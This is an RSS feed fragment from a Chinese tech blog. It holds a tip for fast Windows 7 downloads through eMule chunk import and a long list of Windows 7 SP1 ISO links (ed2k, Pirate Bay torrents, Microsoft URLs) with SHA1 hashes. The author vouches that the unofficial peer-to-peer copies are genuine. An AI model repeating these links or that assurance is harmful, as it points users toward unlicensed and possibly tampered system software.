4.9.23 (rdp file) Buffer Overflow PoC</a></li><li>2009年08月20日 -- <a href="http://www.4shell.org/archives/1027.html" title="“fatal error LNK1104: cannot open file “mfc42u.lib””问题解决">“fatal error LNK1104: cannot open file “mfc42u.lib””问题解决</a></li><li>2009年08月28日 -- <a href="http://www.4shell.org/archives/1066.html" title="dedecms 5.3 – 5.5注入漏洞">dedecms 5.3 – 5.5注入漏洞</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/1922.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>5分钟下完Window7</title>
		<link>http://www.4shell.org/archives/1864.html</link>
		<comments>http://www.4shell.org/archives/1864.html#comments</comments>
		<pubDate>Sun, 03 Apr 2011 22:28:09 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[资源共享]]></category>
		<category><![CDATA[Windows 7]]></category>

		<guid isPermaLink="false">http://www.4shell.org/?p=1864</guid>
		<description><![CDATA[**以下方法同样适用于Windows 7 With SP1 5分钟的确能下完Window7，但有个前提条件，已经存在有一个相同语言且非企业版、非vl版的Windows7。如果还没有下载过任何版本的Windows7，以下方法并不适用，建议你先下载Ultimate版，速度最快。 例如： 拥有Ultimate_x86、starter_x86、professional_x86、home_premium_x86、homebasic_x86中任意一个版本的windows 7就可以得到剩余4个版本中的任意一个版本windows 7。 拥有Ultimate_x64、professional_x64、home_premium_x64中任意一个版本的windows 7就可以得到剩余2个版本中的任意一个版本windows 7。 （理论上还存在有一个homebasic_x64，但不知是什么原因，微软并未发布。） 以下是使用Xtreme获取的方法： 第一步：将所需版本的windows7添加到下载列表。 ‍ 第二步：在所添加的下载文件上右键，“查看文件详情”，仔细观察其中有一项 “Hashset可用:(是/否)”，当显示为是的时候继续下一步（如果显示为否，并且文件大于2G，再继续下一步的话，将有可能出现内存溢出的错误） ‍ &#160; ‍ 第三步：在所添加的下载文件上右键，选择“导入文件块”，并选择相对应的X86或X64版本文win7。（如果没有这个功能，请打开Xtreme选项－扩展设置－显示更多控制(高级模式控制)，打勾，确定。另外，下载x86时不可导入x64的文件，反之。纯浪费时间且无效果） ‍ &#160; ‍ 第四步：安静等待导入完成（可以在 服务器－日志 中观察导入的情况） ‍ ‍ 导入完成后，理论上的完成度就应该就可以达到99%以上，再等待2，3分钟就可以下载完成。如果长时间无反应，可以先停止再继续 这个是最安全，最稳定的快速下载方法，无需借助任何不明身份的第三方软件或者补丁就可以完成。 ‍ &#160; &#160; 相关文章2011年04月4日 -- Windows 7 with SP1中英文原版MSDN下载汇总2009年05月17日 -- Windows 7 RC 7100 GDI驱动Win32k.sys内核D.O.S漏洞]]></description>
			<content:encoded><![CDATA[<p>**以下方法同样适用于Windows 7 With SP1</p>
<p>5分钟的确能下完Window7，但有个前提条件，已经存在有一个相同语言且非企业版、非vl版的Windows7。如果还没有下载过任何版本的Windows7，以下方法并不适用，建议你先下载Ultimate版，速度最快。</p>
<p>例如：</p>
<p>拥有Ultimate_x86、starter_x86、professional_x86、home_premium_x86、homebasic_x86中任意一个版本的windows 7就可以得到剩余4个版本中的任意一个版本windows 7。</p>
<p>拥有Ultimate_x64、professional_x64、home_premium_x64中任意一个版本的windows 7就可以得到剩余2个版本中的任意一个版本windows 7。</p>
<p>（理论上还存在有一个homebasic_x64，但不知是什么原因，微软并未发布。）</p>
<p>以下是使用Xtreme获取的方法：</p>
<p><span id="more-1864"></span></p>
<p>第一步：将所需版本的windows7添加到下载列表。</p>
<p><img src="http://www.4shell.org/wp-content/uploads/images/2011/04/222812wQa.jpg" border="0" alt="" />‍</p>
<p>第二步：在所添加的下载文件上右键，“查看文件详情”，仔细观察其中有一项 “Hashset可用:(是/否)”，当显示为是的时候继续下一步（如果显示为否，并且文件大于2G，再继续下一步的话，将有可能出现内存溢出的错误）</p>
<p><img src="http://www.4shell.org/wp-content/uploads/images/2011/04/2228124n1.jpg" border="0" alt="" />‍</p>
<p>&nbsp;</p>
<p><img src="http://www.4shell.org/wp-content/uploads/images/2011/04/222813Fjz.jpg" border="0" alt="" />‍</p>
<p>第三步：在所添加的下载文件上右键，选择“导入文件块”，并选择相对应的X86或X64版本文win7。（如果没有这个功能，请打开Xtreme选项－扩展设置－显示更多控制(高级模式控制)，打勾，确定。另外，下载x86时不可导入x64的文件，反之。纯浪费时间且无效果）</p>
<p><img src="http://www.4shell.org/wp-content/uploads/images/2011/04/222813jjJ.jpg" border="0" alt="" />‍</p>
<p>&nbsp;</p>
<p><img src="http://www.4shell.org/wp-content/uploads/images/2011/04/222813g0O.jpg" border="0" alt="" />‍</p>
<p>第四步：安静等待导入完成（可以在 服务器－日志 中观察导入的情况）</p>
<p><img src="http://www.4shell.org/wp-content/uploads/images/2011/04/222813NKk.jpg" border="0" alt="" />‍</p>
<p><img src="http://www.4shell.org/wp-content/uploads/images/2011/04/2228149hW.jpg" border="0" alt="" />‍</p>
<p>导入完成后，理论上的完成度就应该就可以达到99%以上，再等待2，3分钟就可以下载完成。如果长时间无反应，可以先停止再继续</p>
<p>这个是最安全，最稳定的快速下载方法，无需借助任何不明身份的第三方软件或者补丁就可以完成。</p>
<p><img src="http://www.4shell.org/wp-content/uploads/images/2011/04/222814Vgf.jpg" border="0" alt="" />‍</p>
<p>&nbsp;</p>
<p><img src="http://www.4shell.org/wp-content/uploads/images/2011/04/222814ONh.jpg" border="0" alt="" /></p>
<p>&nbsp;</p>
<h2  class="related_post_title">相关文章</h2><ul class="related_post"><li>2011年04月4日 -- <a href="http://www.4shell.org/archives/1862.html" title="Windows 7 with SP1中英文原版MSDN下载汇总">Windows 7 with SP1中英文原版MSDN下载汇总</a></li><li>2009年05月17日 -- <a href="http://www.4shell.org/archives/780.html" title="Windows 7 RC 7100 GDI驱动Win32k.sys内核D.O.S漏洞">Windows 7 RC 7100 GDI驱动Win32k.sys内核D.O.S漏洞</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/1864.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Windows 7 with SP1中英文原版MSDN下载汇总</title>
		<link>http://www.4shell.org/archives/1862.html</link>
		<comments>http://www.4shell.org/archives/1862.html#comments</comments>
		<pubDate>Sun, 03 Apr 2011 22:26:03 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[资源共享]]></category>
		<category><![CDATA[MSDN]]></category>
		<category><![CDATA[Windows 7]]></category>

		<guid isPermaLink="false">http://www.4shell.org/?p=1862</guid>
		<description><![CDATA[这里是不是原版？ 答: MSDN，OEM以及零售版都是原版，我可以负责任的告诉你，这里提供的MSDN都是原汁原味的原版系统，具体来讲，本贴下载链接或种子来源有三种: 1. 微软官方网站。 2. MSDN I Tell You（众所周知的可靠原版来源）。 3. 海盗湾，景友或本人 （这一类资源均经过景友或本人验证为原版，无一例外）。 请大家放心下载，这里的种子和链接是没有问题的。 5分钟就能下完Window7? 答: 是的，但有个前提条件，就是本地已经存在一个相同语言且非企业版、非vol版的Windows7。具体方法见http://msdn.itellyou.cn/help.htm#express-download （该方法由景友romanyu推荐，特此感谢） 下载有问题？ 1.版本不符 2.99.9%停止下载，方法1-先按一下暂停然后重新开始；方法2-关闭下载软件，将文件拷到其他地址，去掉后缀；方法3-一直等待，总会下完的。方法4-Google或百度。 文件SHA1校验工具 IHasher （来自http://msdn.itellyou.cn） http://msdn.itellyou.cn/download.aspx?lastversion=ihasher (32位+64位)单独的SP1安装包（来自http://msdn.itellyou.cn 和微软官网,多语言版本） Windows 7 and Window Server 2008 R2 Service Pack 1 (x86 and x64) - DVD (Multilanguage) mu_windows_7_and_windows_server_2008_r2_sp1_x86_x64_dvd_619642.iso (1.91 GB) http://www.microsoft.com/downloads/zh-cn/details.aspx?FamilyID=c3202ce6-4056-4059-8a1b-3a9b77cdfdda### SHA1: F2ABA1102E18EAD08C78527AB422C09AB7D1F54C (32位或64位)单独的SP1安装包（来自微软官网，多语言版本） 32位SP1独立安装包 Windows 7 and Window [...]]]></description>
			<content:encoded><![CDATA[<p><span style="color: #ff00ff;"><strong>这里是不是原版？</strong></span><br />
答: MSDN，OEM以及零售版都是原版，我可以负责任的告诉你，这里提供的MSDN都是原汁原味的原版系统，具体来讲，本贴下载链接或种子来源有三种:<br />
1. 微软官方网站。<br />
2. MSDN I Tell You（众所周知的可靠原版来源）。<br />
3. 海盗湾，景友或本人 （这一类资源均经过景友或本人验证为原版，无一例外）。<br />
请大家放心下载，这里的种子和链接是没有问题的。</p>
<p><span style="color: #ff00ff;"><strong>5分钟就能下完Window7?</strong></span><br />
答: 是的，但有个前提条件，就是本地已经存在一个相同语言且非企业版、非vol版的Windows7。具体方法见http://msdn.itellyou.cn/help.htm#express-download （该方法由景友romanyu推荐，特此感谢）</p>
<p><span style="color: #ff00ff;"><strong>下载有问题？</strong></span><br />
1.<span style="color: #8b0000;">版本不符</span><br />
2.<span style="color: #8b0000;">99.9%停止下载</span>，方法1-先按一下暂停然后重新开始；方法2-关闭下载软件，将文件拷到其他地址，去掉后缀；方法3-一直等待，总会下完的。方法4-Google或百度。<br />
<span id="more-1862"></span></p>
<hr />
<p><span style="color: #ff00ff;"><strong><span style="font-size: medium;">文件SHA1校验工具 IHasher</span></strong></span> （来自http://msdn.itellyou.cn）<br />
<a href="http://msdn.itellyou.cn/download.aspx?lastversion=ihasher" target="_blank">http://msdn.itellyou.cn/download.aspx?lastversion=ihasher</a></p>
<p><span style="color: #ff00ff;"><strong><span style="font-size: medium;">(32位+64位)单独的SP1安装包</span></strong></span><span style="font-size: x-small;"><span>（</span>来自http://msdn.itellyou.cn 和微软官网,多语言版本）</span><span style="font-size: x-small;"><br />
</span><span style="color: #8b0000;">Windows 7 and Window Server 2008 R2 Service Pack 1 (x86 and x64) - DVD (Multilanguage) </span><br />
<span style="color: green;"><a id="ed2k_d9b" href="ed2k://|file|mu_windows_7_and_windows_server_2008_r2_sp1_x86_x64_dvd_619642.iso|2048196608|D1D032D20568F9ED16F072075F4E9961|/" target="_blank">mu_windows_7_and_windows_server_2008_r2_sp1_x86_x64_dvd_619642.iso (1.91 GB)</a><br />
<a href="http://www.microsoft.com/downloads/zh-cn/details.aspx?FamilyID=c3202ce6-4056-4059-8a1b-3a9b77cdfdda###" target="_blank">http://www.microsoft.com/downloads/zh-cn/details.aspx?FamilyID=c3202ce6-4056-4059-8a1b-3a9b77cdfdda###</a></span><br />
SHA1: F2ABA1102E18EAD08C78527AB422C09AB7D1F54C</p>
<p><span style="color: #ff00ff;"><strong><strong><span style="font-size: medium;"><span><strong><span style="font-size: medium;">(</span></strong></span>32位或64位)单</span></strong><span style="font-size: medium;">独的SP1安装包</span></strong></span><span style="font-size: x-small;">（来自微软官网，多语言版本）</span></p>
<p><span>32位SP1独立安装包<br />
Windows 7 and Window Server 2008 R2 Service Pack 1 (x86）</span><br />
<span style="color: #006400;">http://download.microsoft.com/download/0/A/F/0AFB5316-3062-494A-AB78-7FB0D4461357/windows6.1-KB976932-X86.exe</span><br />
SHA1: C3516BC5C9E69FEE6D9AC4F981F5B95977A8A2FA</p>
<p><span>64位SP1独立安装包<br />
Windows 7 and Window Server 2008 R2 Service Pack 1 (x64）</span><br />
<span style="color: #006400;">http://download.microsoft.com/download/0/A/F/0AFB5316-3062-494A-AB78-7FB0D4461357/windows6.1-KB976932-X64.exe</span><br />
SHA1: 74865EF2562006E51D7F9333B4A8D45B7A749DAB</p>
<p><span style="color: #ff00ff;"><strong><span style="font-size: medium;"><span><strong><span style="font-size: medium;">(</span></strong></span>32位或64位)语言包</span></strong></span><span style="font-size: x-small;">（电驴链接来自http://msdn.itellyou.cn;BT种子来源海盗湾,验证为原版）</span></p>
<p><span style="color: #8b0000;">32位语言包（多语言）<br />
Windows 7 Service Pack 1 Language Pack (x86) - DVD (Multilanguage) </span><br />
<span style="color: #006400;"><a id="ed2k_0Zt" href="ed2k://|file|mu_windows_7_sp1_language_pack_x86_dvd_619716.iso|2256947200|C2E9A2E2A1A46237B18F6D55CA02458E|/" target="_blank">mu_windows_7_sp1_language_pack_x86_dvd_619716.iso (2.1 GB)</a></span><br />
<span style="font-size: xx-small;"><span style="color: blue;"><img src="http://bbs.pcbeta.com/static/image/filetype/torrent.gif" border="0" alt="" /> <a href="http://bbs.pcbeta.com/forum-attachment-aid-MjQ3NTczMnw0ZDdlNTJjYnwxMzAxODY4OTk1fDYyMzgwNQ%3D%3D.html" target="_blank">mu_windows_7_sp1_language_pack_x86_dvd_619716.iso.6180150.TPB.torrent</a> <em>(11.23 KB, 下载次数: 605) </em></span></span><br />
SHA1: E9261433FF5CCACA818328A9BDBBED3F21A6405E</p>
<p><span style="color: #8b0000;">64位语言包（多语言）<br />
Windows 7 Service Pack 1 Language Pack (x64) - DVD (Multilanguage) </span><br />
<span style="color: #006400;"><a id="ed2k_oq9" href="ed2k://|file|mu_windows_7_sp1_language_pack_x64_dvd_619714.iso|2745993216|D5643546A3D61444CCC4D05BC24E4F11|/" target="_blank">mu_windows_7_sp1_language_pack_x64_dvd_619714.iso (2.56 GB)</a></span><br />
<span style="font-size: xx-small;"><span style="color: blue;"><img src="http://bbs.pcbeta.com/static/image/filetype/torrent.gif" border="0" alt="" /> <a href="http://bbs.pcbeta.com/forum-attachment-aid-MjQ3NTczMXxiMzcwOTExMHwxMzAxODY4OTk1fDYyMzgwNQ%3D%3D.html" target="_blank">mu_windows_7_sp1_language_pack_x64_dvd_619714.iso.6180161.TPB.torrent</a> <em>(13.49 KB, 下载次数: 325) </em></span></span><br />
SHA1: 7CD1FE568D968D89792DC9FF20E9AF2B318995C2</p>
<p><span style="color: #ff00ff;"><strong><span style="font-size: medium;">英文版Windows 7集成SP1原版光盘镜像</span></strong></span><span style="font-size: x-small;">（主要来自于http://msdn.itellyou.cn,英文专业版（批量授权）链接来源于LinZiqing本人)</span></p>
<p><span style="color: #8b0000;">英文家庭基础版32位<br />
Windows 7 Home Basic with Service Pack 1 (x86) - DVD (English) </span><br />
<span style="color: #006400;"><a id="ed2k_F3b" href="ed2k://|file|en_windows_7_home_basic_with_sp1_x86_dvd_620759.iso|2563039232|751B4680F192A6E3E708392027D1DC8F|/" target="_blank">en_windows_7_home_basic_with_sp1_x86_dvd_620759.iso (2.39 GB)</a></span><br />
SHA1: 047AF9ECEA6F9430B2C0CA64CE8A6F888FCD5A64</p>
<p><span style="color: #8b0000;">英文家庭高级版32位<br />
Windows 7 Home Premium with Service Pack 1 (x86) - DVD (English) </span><br />
<span style="color: #006400;"><a id="ed2k_4ph" href="ed2k://|file|en_windows_7_home_premium_with_sp1_x86_dvd_620895.iso|2563039232|F3913DFA34DC8046EDF66960E03DD65C|/" target="_blank">en_windows_7_home_premium_with_sp1_x86_dvd_620895.iso (2.39 GB)</a></span><br />
SHA1: 22DF3E5A80F8DBF014C2776A01B1CD9F24D83233</p>
<p><span style="color: #8b0000;">英文家庭高级版64位<br />
Windows 7 Home Premium with Service Pack 1 (x64) - DVD (English) </span><br />
<span style="color: #006400;"><a id="ed2k_FqY" href="ed2k://|file|en_windows_7_home_premium_with_sp1_x64_dvd_620851.iso|3319478272|A6C07AFAC9205B36E6ED99538211C5B2|/" target="_blank">en_windows_7_home_premium_with_sp1_x64_dvd_620851.iso (3.09 GB)</a></span><br />
SHA1: B4821F46A171708F5F8F8A0EF48FC16529437961</p>
<p><span style="color: #8b0000;">英文专业版32位<br />
Windows 7 Professional with Service Pack 1 (x86) - DVD (English) </span><br />
<span style="color: #006400;"><a id="ed2k_Td3" href="ed2k://|file|en_windows_7_professional_with_sp1_x86_dvd_631025.iso|2563039232|70DB0BC59EB7B6763DD352535015A618|/" target="_blank">en_windows_7_professional_with_sp1_x86_dvd_631025.iso (2.39 GB)</a></span><br />
SHA1: 917A542B0541054BB9C2A06A11A46AED6943856B</p>
<p><span style="color: #8b0000;">英文专业版64位<br />
Windows 7 Professional with Service Pack 1 (x64) - DVD (English) </span><br />
<span style="color: #006400;"><a id="ed2k_Cmv" href="ed2k://|file|en_windows_7_professional_with_sp1_x64_dvd_621750.iso|3319478272|B84DB34D00211AF704F1EB09A8CF6921|/" target="_blank">en_windows_7_professional_with_sp1_x64_dvd_621750.iso (3.09 GB)</a></span><br />
SHA1: 5ED2584110E03F498DB4458BA9FAFD5A7EF602ED</p>
<p><span style="color: #8b0000;">英文专业版（批量授权）32位<br />
Windows 7 Professional with Service Pack 1, VL Build (x86) - DVD (English) </span><br />
<span style="color: #006400;"><a id="ed2k_hd7" href="ed2k://|file|en_windows_7_professional_with_sp1_vl_build_x86_dvd_623530.ISO|2433216512|48B7948A7BCA2CB56795F03332811FCD|/" target="_blank">en_windows_7_professional_with_sp1_vl_build_x86_dvd_623530.ISO (2.27 GB)</a></span><br />
SHA1: 85E9767CD50C6083160393F85CB2C4156CD9348D</p>
<p><span style="color: #8b0000;">英文专业版（批量授权）64位<br />
Windows 7 Professional with Service Pack 1, VL Build (x64) - DVD (English) </span><br />
<span style="color: #006400;"><a id="ed2k_5u2" href="ed2k://|file|en_windows_7_professional_with_sp1_vl_build_x64_dvd_622458.ISO|3181668352|CC8937EEA6B1EA7B8BDB3881236BA878|/" target="_blank">en_windows_7_professional_with_sp1_vl_build_x64_dvd_622458.ISO (2.96 GB)</a></span><br />
SHA1: 647C756B95EEF95C05EA04EEAFED035E0065EB9E</p>
<p><span style="color: #8b0000;">英文企业版32位<br />
Windows 7 Enterprise with Service Pack 1 (x86) - DVD (English) </span><br />
<span style="color: #006400;"><a id="ed2k_oFj" href="ed2k://|file|en_windows_7_enterprise_with_sp1_x86_dvd_620186.iso|2433157120|C592647AFD661B183CD1A6C5774B36DE|/" target="_blank">en_windows_7_enterprise_with_sp1_x86_dvd_620186.iso (2.27 GB)</a></span><br />
SHA1: 4788041EB06E0F49720C112FBD256AC637909D4F</p>
<p><span style="color: #8b0000;">英文企业版64位<br />
Windows 7 Enterprise with Service Pack 1 (x64) - DVD (English) </span><br />
<span style="color: #006400;"><a id="ed2k_ohf" href="ed2k://|file|en_windows_7_enterprise_with_sp1_x64_dvd_620201.iso|3181234176|49320FA39FFE3F5C09719EC225E04EFC|/" target="_blank">en_windows_7_enterprise_with_sp1_x64_dvd_620201.iso (2.96 GB)</a></span><br />
SHA1: 2C9774A1F48570E749E6D33C642FE8F6F7898CB0</p>
<p><span style="color: #8b0000;">英文旗舰版32位<br />
Windows 7 Ultimate with Service Pack 1 (x86) - DVD (English) </span><br />
<span style="color: #006400;"><a id="ed2k_5b1" href="ed2k://|file|en_windows_7_ultimate_with_sp1_x86_dvd_619077.iso|2563039232|60C9D5F92AFFA625F7A40717C6B264D9|/" target="_blank">en_windows_7_ultimate_with_sp1_x86_dvd_619077.iso (2.39 GB)</a></span><br />
SHA1: 92C1ADA4FF09C76EC2F1974940624CAB7F822F62</p>
<p><span style="color: #8b0000;">英文旗舰版64位<br />
Windows 7 Ultimate with Service Pack 1 (x64) - DVD (English) </span><br />
<span style="color: #006400;"><a id="ed2k_7JC" href="ed2k://|file|en_windows_7_ultimate_with_sp1_x64_dvd_618240.iso|3319478272|004498E6851D90B5E025049604942C86|/" target="_blank">en_windows_7_ultimate_with_sp1_x64_dvd_618240.iso (3.09 GB)</a></span><br />
SHA1: 1693B6CB50B90D96FC3C04E4329604FEBA88CD51</p>
<p><span style="color: #ff00ff;"><strong><span style="font-size: medium;">简体中文版Windows 7集成SP1原版光盘镜像</span></strong></span><span style="font-size: x-small;">（主要来自于http://msdn.itellyou.cn, 32位企业版和旗舰版电驴链接为景友clemond先于MSDN I Tell You发布，但下载链接是一样的。32位旗舰版BT种子由景友sooyun制作，确认为原版；64位旗舰版BT种子来自于景友sooyun和parick,均验证为原版，其中sooyun为首发。中文专业版32位和64位BT种子由景友jattyshen发布，确认为原版。）</span></p>
<p><span>中文初级版32位</span><br />
<span style="color: #8b0000;">Windows 7 Starter with Service Pack 1 (x86) - DVD (Chinese-Simplified) </span><br />
<span style="color: #006400;"><a id="ed2k_SiV" href="ed2k://|file|cn_windows_7_starter_with_sp1_x86_dvd_624050.iso|2651877376|47588C006F1FC712080A6185044AB156|/" target="_blank">cn_windows_7_starter_with_sp1_x86_dvd_624050.iso (2.47 GB)</a></span><br />
SHA1: 6F5556ABBEFD828C22AEBBF9FBC15E2E3773F999</p>
<p><span>中文家庭基础版32位</span><br />
<span style="color: #8b0000;">Windows 7 Home Basic with Service Pack 1 (x86) - DVD (Chinese-Simplified)</span><span style="color: #006400;"><a id="ed2k_lxs" href="ed2k://|file|cn_windows_7_home_basic_with_sp1_x86_dvd_620743.iso|2651877376|FA334A8DA440C880A34553F2E7CCF9B1|/" target="_blank">cn_windows_7_home_basic_with_sp1_x86_dvd_620743.iso (2.47 GB)</a></span><br />
SHA1: A5E7B9238FE12DFD7DC6159E2AA92A690C366B12</p>
<p><span>中文家庭高级版32位</span><br />
<span style="color: #8b0000;">Windows 7 Home Premium with Service Pack 1 (x86) - DVD (Chinese-Simplified) </span><br />
<span style="color: #006400;"><a id="ed2k_K2m" href="ed2k://|file|cn_windows_7_home_premium_with_sp1_x86_dvd_620856.iso|2651877376|F0DCDB42A6A3F16C68898A6834521E47|/" target="_blank">cn_windows_7_home_premium_with_sp1_x86_dvd_620856.iso (2.47 GB)</a></span><br />
SHA1: 56903FDA27100BF8AC196D2C829315884EF47E43</p>
<p><span>中文家庭高级版64位</span><br />
<span style="color: #8b0000;">Windows 7 Home Premium with Service Pack 1 (x64) - DVD (Chinese-Simplified) </span><br />
<span style="color: #006400;"><a id="ed2k_J6z" href="ed2k://|file|cn_windows_7_home_premium_with_sp1_x64_dvd_620792.iso|3419052032|5696C317BE29542579A0E1DFC9FDCB7F|/" target="_blank">cn_windows_7_home_premium_with_sp1_x64_dvd_620792.iso (3.18 GB)</a></span><br />
SHA1: 5A09954C370D3A163A0AAE0013420F90FAE422EE</p>
<p><span>中文专业版32位</span><br />
<span style="color: #8b0000;">Windows 7 Professional with Service Pack 1 (x86) - DVD (Chinese-Simplified) </span><br />
<span style="color: #006400;"><a id="ed2k_dke" href="ed2k://|file|cn_windows_7_professional_with_sp1_x86_dvd_622569.iso|2651877376|56C4B513A6109715CD2BEBFBA80370A0|/" target="_blank">cn_windows_7_professional_with_sp1_x86_dvd_622569.iso (2.47 GB)</a></span><br />
<span style="font-size: xx-small;"><span style="color: #0000ff;"><img src="http://bbs.pcbeta.com/static/image/filetype/torrent.gif" border="0" alt="" /> <a href="http://bbs.pcbeta.com/forum-attachment-aid-MjQ3NzY5M3wzNmQ0YzgyNXwxMzAxODY4OTk1fDYyMzgwNQ%3D%3D.html" target="_blank">cn_windows_7_professional_with_sp1_x86_dvd_622569.iso.torrent</a> <em>(99.31 KB, 下载次数: 1285) </em></span></span><br />
SHA1: AC125D0D1B3BCECE24BB7711F09DE89D1D5F4494</p>
<p><span>中文专业版64位</span><br />
<span style="color: #8b0000;">Windows 7 Professional with Service Pack 1 (x64) - DVD (Chinese-Simplified) </span><br />
<span style="color: #006400;"><a id="ed2k_AK9" href="ed2k://|file|cn_windows_7_professional_with_sp1_x64_dvd_621744.iso|3419052032|A14DCBDA295966DC95B74250595961AB|/" target="_blank">cn_windows_7_professional_with_sp1_x64_dvd_621744.iso (3.18 GB)</a></span><br />
<span style="font-size: xx-small;"><span style="color: #0000ff;"><img src="http://bbs.pcbeta.com/static/image/filetype/torrent.gif" border="0" alt="" /> <a href="http://bbs.pcbeta.com/forum-attachment-aid-MjQ3NzY5Mnw2MGQyZjg0YXwxMzAxODY4OTk1fDYyMzgwNQ%3D%3D.html" target="_blank">cn_windows_7_professional_with_sp1_x64_dvd_621744.iso.torrent</a> <em>(16.3 KB, 下载次数: 600) </em></span></span><br />
SHA1: BD12A9DF4EF2960B1919AD0048B81380B679194E</p>
<p><span>中文专业版（批量授权）32位</span><br />
<span style="color: #8b0000;">Windows 7 Professional with Service Pack 1, VL Build (x86) - DVD (Chinese-Simplified) </span><br />
<span style="color: #006400;"><a id="ed2k_13x" href="ed2k://|file|cn_windows_7_professional_with_sp1_vl_build_x86_dvd_623494.iso|2501564416|59D4D471E0A3A5AA786FC55B26FFF0D7|/" target="_blank">cn_windows_7_professional_with_sp1_vl_build_x86_dvd_623494.iso (2.33 GB)</a></span><br />
SHA1: 2D5127FB53B21DC35F4455E87FF1BE52D48B6D57</p>
<p><span>中文专业版（批量授权）64位</span><br />
<span style="color: #8b0000;">Windows 7 Professional with Service Pack 1, VL Build (x64) - DVD (Chinese-Simplified) </span><br />
<span style="color: #006400;"><a id="ed2k_2lj" href="ed2k://|file|cn_windows_7_professional_with_sp1_vl_build_x64_dvd_622431.iso|3264618496|B4BBA4C9AAB04524A542298DDEDB81E9|/" target="_blank">cn_windows_7_professional_with_sp1_vl_build_x64_dvd_622431.iso (3.04 GB)</a></span><br />
SHA1: C2BEAC6955851BB4BBC0DEAE32C2C85763369E0D</p>
<p><span>中文企业版32位</span><br />
<span style="color: #8b0000;">Windows 7 Enterprise with Service Pack 1 (x86) - DVD (Chinese-Simplified) </span><br />
<span style="color: #006400;"><a id="ed2k_088" href="ed2k://|file|cn_windows_7_enterprise_with_sp1_x86_dvd_620153.iso|2501507072|7788AED3A02EB99DE1341771950EB697|/" target="_blank">cn_windows_7_enterprise_with_sp1_x86_dvd_620153.iso (2.33 GB)</a></span><br />
SHA1: FF7A3A72DC56E51DEF1FB6F2D6CCE38A5CBE298E</p>
<p><span>中文企业版64位</span><br />
<span style="color: #8b0000;">Windows 7 Enterprise with Service Pack 1 (x64) - DVD (Chinese-Simplified) </span><br />
<span style="color: #006400;"><a id="ed2k_ZKe" href="ed2k://|file|cn_windows_7_enterprise_with_sp1_x64_dvd_620654.iso|3264206848|FAEF3BD4D9AF6C529533CA6468E1911E|/" target="_blank">cn_windows_7_enterprise_with_sp1_x64_dvd_620654.iso (3.04 GB)</a></span><br />
SHA1: 37AA1CA36E6F6FC317E7B278A391A942594DCB5A</p>
<p><span>中文旗舰版32位</span><br />
<span style="color: #8b0000;">Windows 7 Ultimate with Service Pack 1 (x86) - DVD (Chinese-Simplified) </span><br />
<span style="color: #006400;"><a id="ed2k_P3k" href="ed2k://|file|cn_windows_7_ultimate_with_sp1_x86_dvd_618763.iso|2651877376|D6A0D9FDB8C67A65B92B4C1AC197109C|/" target="_blank">cn_windows_7_ultimate_with_sp1_x86_dvd_618763.iso (2.47 GB)</a></span><br />
<span style="font-size: xx-small;"><span style="color: #0000ff;"><img src="http://bbs.pcbeta.com/static/image/filetype/torrent.gif" border="0" alt="" /> <a href="http://bbs.pcbeta.com/forum-attachment-aid-MjQ3NzA4NHw0YWM1NThlM3wxMzAxODY4OTk1fDYyMzgwNQ%3D%3D.html" target="_blank">cn_windows_7_ultimate_with_sp1_x86_dvd_618763.iso.torrent</a> <em>(14.2 KB, 下载次数: 5715) </em></span></span><br />
SHA1: A94623A6B572541157B63FFD9C0495ED47BE792A</p>
<p><span>中文旗舰版64位</span><br />
<span style="color: #8b0000;">Windows 7 Ultimate with Service Pack 1 (x64) - DVD (Chinese-Simplified) </span><br />
<span style="color: #006400;"><a id="ed2k_6pZ" href="ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_618537.iso|3419052032|56E90251E665E643C81168F6DD870BCB|/" target="_blank">cn_windows_7_ultimate_with_sp1_x64_dvd_618537.iso (3.18 GB)</a></span><br />
<span style="font-size: xx-small;"><span style="color: #0000ff;"><img src="http://bbs.pcbeta.com/static/image/filetype/torrent.gif" border="0" alt="" /> <a href="http://bbs.pcbeta.com/forum-attachment-aid-MjQ3ODgyOHxjY2UyOWU2OHwxMzAxODY4OTk1fDYyMzgwNQ%3D%3D.html" target="_blank">cn_windows_7_ultimate_with_sp1_x64_dvd_618537(sooyun).iso.torrent</a> <em>(17.81 KB, 下载次数: 661) </em><br />
<img src="http://bbs.pcbeta.com/static/image/filetype/torrent.gif" border="0" alt="" /> <a href="http://bbs.pcbeta.com/forum-attachment-aid-MjQ3NzY2MXw1OTFmZjY0MXwxMzAxODY4OTk1fDYyMzgwNQ%3D%3D.html" target="_blank">cn_windows_7_ultimate_with_sp1_x64_dvd_618537.iso.torrent</a> <em>(128.1 KB, 下载次数: 2891) </em></span></span><br />
SHA1: 1FF1C323F49F76179837ACCB5D33FA0B1DFAA201</p>
<hr />
<p><span style="color: #ff00ff;"><strong>更新日志</strong></span><br />
<span style="font-size: x-small;">1.北京时间2月17日凌晨1点，发布 Windows 7 SP1独立安装包.<br />
2.北京时间2月17日凌晨，添加英文企业版SP1集成版和旗舰版SP1集成版.<br />
3.北京时间2月17日，新增语言包，种子来源于海盗湾，为jody99于2月17日发布.<br />
4.北京时间2月18日凌晨1点，新增英文专业版（批量授权）, 为ip221于2月17日发布于飞速网，希望下载完的朋友能够制作个BT种子或电驴链接，方便大家下载.<br />
5.北京时间2月18日15点，更新语言包下载链接，新增家庭基础版，家庭高级版，专业版下载。专业批量版暂移至12楼，待更新。<br />
6.北京时间2月19日凌晨3点，重新添加语言包BT种子（种子来源于海盗湾，为jody99于2月17日发布），32位和64位文件均验证为微软原版，并且已经储存在迅雷云端（见12楼附图1），迅雷会员可直接离线下载，非会员稍后便有较快速度。英文专业版（批量授权）（ip221飞速网版）经验证为微软原版， 本人已制作电驴链接，目前正在由迅雷离线下载提取至云端，上传完成后会及时发布，请持续关注（见12楼附图2）<br />
7.北京时间2月19日22点，简化帖子编排，原贴放于21楼。英文专业版（批量授权）迅雷离线上传进度为：32位，68%；64位，44%，请继续关注。<br />
